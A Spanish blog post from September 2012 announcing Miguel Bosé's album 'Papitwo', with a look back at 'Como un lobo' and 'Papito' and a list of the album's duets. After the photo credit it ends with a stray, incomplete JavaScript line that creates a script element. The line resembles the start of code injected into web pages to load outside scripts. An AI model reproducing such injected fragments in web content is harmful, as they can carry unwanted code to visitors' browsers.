Bosé repite: Papitwo al caer

04/09/2012

Y como un lobo voy detrás de ti, paso a paso, tu huella he de seguir…

¿Quién no ha escuchado o incluso tatareado alguna vez esta canción? ¿Hay alguien que no sepa que Como un lobo va obligatoriamente ligada al nombre Bosé?

Allá por el año 1987 un revolucionario Miguel Bosè publica el álbum XXX, justo una década después de lanzarse al estrellato con aquel memorable Linda. Entre otras muchas, Como un lobo, formaba parte de este disco. Y quién le iba a decir al único vástago de Luis Miguel Dominguín y de Lucía Bosé que veinte años después dicha canción iba a retriunfar y sonar en las radios de medio mundo… gracias al hit Papito…

Y ahora Miguel quiere repetir aquel éxito rotundo y volver a batir récords como en su día Papito lo hiciera… con cinco discos de platino… Se repite aquella gira con un nuevo álbum: Papitwo. Y la verdad es que suena igual de apetecible. Escucharemos a una novedosa Penélope Cruz con Decirnos adiós, un tema nuevo. Nos deleitaremos con aquella memorable Linda, renovada y cantada a dúo con Malú. O nos enterneceremos con la fusión de voces de Alborán & Bosè con Puede que

Queda dicho. Nuevos récords están por batirse. Hoy 4 de septiembre se lanza Papitwo. Atentos a las fechas de la gira… perderse en uno de esos conciertos será una auténtica maravilla.

Foto | FOTOSONS.COM

var d=document;var s=d.createElement(‘script’);